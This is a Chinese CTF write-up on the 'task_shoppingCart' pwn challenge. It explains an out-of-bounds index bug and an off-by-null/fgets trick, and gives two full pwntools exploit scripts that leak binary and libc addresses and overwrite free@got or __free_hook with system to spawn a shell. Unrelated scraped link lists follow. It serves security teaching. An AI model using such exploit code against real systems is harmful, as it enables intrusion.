前言

相关题目位于

https://gitee.com/hac425/blog_data/tree/master/hwb

task_shoppingCart

漏洞位于 00BD9

用户输入 idx 然后根据索引找到表项( T ), 然后取 T 开头的 8 字节作为指针,先打印内容,然后修改。

通过漏洞,加上上图那种逻辑结构我们就可以查看并修改 data 的数据。

这个题的关键工作就是构造上图的结构。

开始以为和之前的一场比赛的题一样,程序中会有一个地方存着指向 got 表的指针

https://www.cnblogs.com/hac425/p/9416777.html

发现在程序开了 pie 后貌似就没有了。

方法一

后来看 wp 发现在 0x202068 处存放着一个指针, 指向自身, 这个指针貌似是在 fini_array 的函数里面会用到。

可以用它来做信息泄露

调试时

泄露程序基地址

利用 0x202068 这个指向自身的特性,最后我们可以拿到 程序的基地址

# (0x2021E0-0x202068)/8 , 0x202068存放指向自身的指针,通过这个可以 leak  bin 的基地址。

p.sendlineafter("Now, buy buy buy!", "3")

p.sendlineafter("Which goods you need to modify?", str(-47))

p.recvuntil("to modify ")

leak = u64(p.recvuntil(" to?", drop=True).ljust(8, "\x00"))

bin.address = leak - 0x202068

info("bin.address: {}".format(hex(bin.address)))

# padding

p.send(p64(bin.address + 0x202140))

构造结构,查看并修改 got

最终需要构造的结构为

其中 0x0000555555756018free@got 的地址。

利用开始创建的两个 account 来构造即可。

然后在泄露出 free 的地址后,把 free@got 改成 system ,然后 free("sh\x00") 即可 。

具体 exp:

#!/usr/bin/env python

# encoding: utf-8

from pwn import *

context.terminal = ['tmux', 'splitw', '-h']

# context.log_level = "debug"

BinPath = "./task_shoppingCart"

LibcPath = "/lib/x86_64-linux-gnu/libc-2.23.so"

bin = ELF(BinPath)

libc = ELF(LibcPath)

bin.address = 0x0000555555554000

# context.binary = bin

p = process(BinPath, aslr=0)

def login():

    p.sendlineafter("EMMmmm, you will be a rich man!", "1")

    p.sendlineafter("RMB or Dollar?", "RMB")

def logout():

    p.sendlineafter("EMMmmm, you will be a rich man!", "3")

def create_good(data, length):

    p.sendlineafter("Now, buy buy buy!", "1")

    p.sendlineafter("How long is your goods name?", str(length))

    p.sendafter("What is your goods name?", data)

def modify_good(idx, data):

    p.sendlineafter("Now, buy buy buy!", "3")

    p.sendlineafter("Which goods you need to modify?", str(idx))

    p.sendafter("OK, what would you like", data)

def free_good(idx):

    p.sendlineafter("Now, buy buy buy!", "2")

    p.sendlineafter("Which goods that you don't need?", str(idx))

# 创建两个 account, 后面用于伪造结构

login()

login()

logout()

create_good("sh\x00" , 8)

create_good("b" * 8 , 8)

create_good("c" * 8 , 8)

free_good(1)

# (0x2021E0-0x202068)/8 , 0x202068存放指向自身的指针,通过这个可以 leak  bin 的基地址。

p.sendlineafter("Now, buy buy buy!", "3")

p.sendlineafter("Which goods you need to modify?", str(-47))

p.recvuntil("to modify ")

leak = u64(p.recvuntil(" to?", drop=True).ljust(8, "\x00"))

bin.address = leak - 0x202068

info("bin.address: {}".format(hex(bin.address)))

#  accouont_table 的地址

p.send(p64(bin.address + 0x202140))

# 利用 account 1 , 往 0x2020A0 写入 puts@got 的地址

modify_good(-20, p64(bin.got['free']))

# 利用 account 2 , 往 0x2020A8 写入 0x2020A0, 构造一个写的结构

modify_good(-19, p64(bin.address + 0x2020A0))

# gdb.attach(p, """

# break *0x0555555554C45

# """)

# pause()

# (0x2021E0-0x2020A8)/8

p.sendlineafter("Now, buy buy buy!", "3")

p.sendlineafter("Which goods you need to modify?", str(-39))

p.recvuntil("to modify ")

leak = u64(p.recvuntil(" to?", drop=True).ljust(8, "\x00"))

libc.address = leak - libc.symbols['free']

info("libc.address: {}".format(hex(libc.address)))

p.send(p64(libc.symbols['system'])[0:7])

free_good(0)

p.interactive()

方法二

这个方法主要利用的是 off by nullfgets 的工作特性。

首先是 off by null

这里往 name_ptr 的 第 9 个字节写 \x00 ,通过改 currency_type 的最后一项可以让 account_table 第一项的第一个字节为 \x00, 这样会让指针落在 stdin 用于暂存数据的缓冲区。

在第一次调用 fgets 时,会为 fp 参数的 _IO_buf_base 分配一块内存用于暂存用户发过来的数据。

这块缓冲区是在 heap 区的顶部。所以当 account_table[0] 的指针的最低字节被置 \x00 后,会落入 stdin_IO_buf_base 里面, 于是我们通过往程序发送数据,就可以构造我们之前所说的那种实现地址写读写的操作。

详细可以看 exp :

#!/usr/bin/env python

# encoding: utf-8

from pwn import *

import time

libc_name = '/lib/x86_64-linux-gnu/libc-2.23.so'

# context.log_level = 'debug'

context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./task_shoppingCart')

p = process('./task_shoppingCart', aslr=0)

libc = ELF(libc_name)

def add(size, name):

    p.recvuntil("Now, buy buy buy!")

    p.sendline('1')

    p.recvuntil("name?")

    p.sendline(str(size))

    p.recvuntil("What is your goods name?")

    p.send(name)

def delete(idx):

    p.recvuntil("Now, buy buy buy!")

    p.sendline('2')

    p.recvuntil("Which goods that you don't need?")

    p.sendline(str(idx))

def edit(idx):

    p.recvuntil("Now, buy buy buy!")

    p.sendline('3')

    p.recvuntil("Which goods you need to modify?")

    p.sendline(str(idx))

def edit_vul(context):

    p.recvuntil("Now, buy buy buy!")

    p.sendline('3')

    p.recvuntil("Which goods you need to modify?")

    p.send(context)

# 首先填满 account 数组

for i in range(0x13):

    p.recvuntil("EMMmmm, you will be a rich man!")

    p.sendline('1')

    p.recvuntil("I will give you $9999, but what's the  currency type you want, RMB or Dollar?")

    p.sendline('a' * 8)

p.recvuntil("EMMmmm, you will be a rich man!")

p.sendline('1')

p.recvuntil("I will give you $9999, but what's the  currency type you want, RMB or Dollar?")

p.sendline('b' * 8)

p.recvuntil("EMMmmm, you will be a rich man!")

p.sendline('3')

# 构造一个 unsorted bin , 目的是为了 unsorted bin  里面的两个指针

add(0x100, 'p4nda')  # 0

add(0x70, '/bin/sh\x00')  # 1

delete(0)

# 通过 分配 0 字节大小的 name, 可以绕过 create good 时的 设置 \x00 , 进而泄露出 libc

add(0, '')  # 2

edit(2)

p.recvuntil('OK, what would you like to modify ')

libc_addr = u64(p.recv(6).ljust(8, '\x00'))

libc.address = libc_addr - 0x10 - 344 - libc.symbols['__malloc_hook']

p.send('p4nda')

print '[+] leak', hex(libc_addr)

print '[+] system', hex(libc.symbols['system'])

# 编辑 account_table[19]

edit((0x202140 + 19 * 8 - 0x2021E0) / 8 & 0xffffffffffffffff)

p.recvuntil('to?')

p.send('d' * 8)

gdb.attach(p)

pause()

payload = (str((0x202140 - 0x2021E0) / 8 & 0xffffffffffffffff) + '\n')

# fgets 的工作流程应该是 :

# 1. 用户发送数据到程序, 程序把数据存在 stdin 的暂存缓冲区

# 2. fgets 按需取数据

payload += (str(2) + '\n')

payload += (str(1) + '\n')

payload = payload.ljust(0x1000 - 0x20, 'a')

payload += p64(libc.symbols['__free_hook'])

edit_vul(payload)

# 写数据用的是 read , 也许会清空之前的缓存数据?

p.recvuntil('to?')

p.send(p64(libc.symbols['system']))

p.interactive()

参考

https://xz.aliyun.com/t/2897#toc-5

https://xz.aliyun.com/t/2892#toc-3

https://xz.aliyun.com/t/2893#toc-7

护网杯 task_shoppingCart 记录的更多相关文章

  1. 护网杯圆满结束,还不满足?不如来看看大佬的WP扩展思路~

    护网杯预选赛 WP转载自:https://qingchenldl.github.io/2018/10/13/%E6%8A%A4%E7%BD%91%E6%9D%AFWP-BitPwn/#more WEB ...

  2. 2019护网杯baby_forensic

    题目名称:baby_forensic题目描述:can you catch the flag?附件:“data.7z” 2019护网杯初赛的一道取证题,比赛时没做出来,赛后又研究了一下. 获取profi ...

  3. buu[护网杯 2018]easy_tornado

    [护网杯 2018]easy_tornado 1.看看题目给了我们三个文件: /flag.txt url=?filename=/flag.txt&filehash=98c6aac4fbecf1 ...

  4. [原题复现]2018护网杯(WEB)easy_tornado(模板注入)

    简介 原题复现:  考察知识点:模板注入  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 [护网杯 2018]eas ...

  5. 护网杯2019 mergeheap --pwn

    护网 又是签到 一天 这道题一开始 不懂得如何泄露 libc 信息,就蒙了  后来群里师傅也是刚刚好 做出 到这里 我就接着做了 . 先看下保护,发现  全开了 然后 就看下流程 大概 就是添加  c ...

  6. 护网杯 three hit 复现(is_numeric引发的二次注入)

    1.题目源码 https://github.com/ZhangAiQiang/three-hit 题目并不真的是当时源码,是我根据做法自己写的,虽然代码烂,但是还好能达到复现的目的 ,兄弟们star一 ...

  7. 2018护网杯-easy_laravel 复现

    题目docker环境: https://github.com/sco4x0/huwangbei2018_easy_laravel git clone下来直接composer up -d 运行即可,可以 ...

  8. 护网杯web

    首先进入网页后,观察到有sign up 点击sign up 进行注册 再点击sign in 进行登录 进入一个买辣条的界面,可以知道,5元可以买一包大辣条,多包大辣条可以换一包辣条之王,多包辣条之王可 ...

  9. 护网杯一道crypto

    import os def xor(a,b): assert len(a)==len(b) c="" for i in range(len(a)): c+=chr(ord(a[i] ...

随机推荐

  1. Nginx 简易教程

    Nginx 本项目是一个 Nginx 极简教程,目的在于帮助新手快速入门 Nginx. demos 目录中的示例模拟了工作中的一些常用实战场景,并且都可以通过脚本一键式启动,让您可以快速看到演示效果. ...

  2. oracle exp imp日常使用

    http://www.cnblogs.com/ningvsban/archive/2012/12/22/2829009.html http://www.cnblogs.com/mq0036/archi ...

  3. windows2016 安装mysql5.7

    下载msi安装包,一路下一步. 安装好后,做下简单配置. 默认的my.ini和datadir在C:\ProgramData\MySQL Server 5.7下 更改默认my.ini的方法为修改注册表 ...

  4. 课程一(Neural Networks and Deep Learning),第二周(Basics of Neural Network programming)—— 3、Python Basics with numpy (optional)

    Python Basics with numpy (optional)Welcome to your first (Optional) programming exercise of the deep ...

  5. Win7上Spark WordCount运行过程及异常

    WordCount.Scala代码如下: package com.husor.Spark /** * Created by huxiu on 2014/11/26. */ import org.apa ...

  6. (转)pathlib路径库使用详解

    原文:https://xin053.github.io/2016/07/03/pathlib%E8%B7%AF%E5%BE%84%E5%BA%93%E4%BD%BF%E7%94%A8%E8%AF%A6 ...

  7. Android中Serializable和Parcelable序列化对象详解

    学习内容: 1.序列化的目的 2.Android中序列化的两种方式 3.Parcelable与Serializable的性能比较 4.Android中如何使用Parcelable进行序列化操作 5.P ...

  8. print默认在末尾添加一个换行符,但其实也可以不用!

    白月黑羽今天给大家分享另外一个冷知识:) python中 print函数打印信息时默认添加一个换行符,所以你看到一条print语句,则单独占一行,那是否可以不要换行符呢? 答案是肯定的,当然可以,可用 ...

  9. mysql 之 主从同步(单向同步和双向同步)

    一. 实验环境部署 主服务器(MySQL-01) IP: 192.168.8.241  端口3306  ,操作系统:Centos6.5 64位 从服务器(MySQL-02)  IP: 192.168. ...

  10. Python高级特性:迭代器和生成器

    在Python中,很多对象都是可以通过for语句来直接遍历的,例如list.string.dict等等,这些对象都可以被称为可迭代对象.至于说哪些对象是可以被迭代访问的,就要了解一下迭代器相关的知识了 ...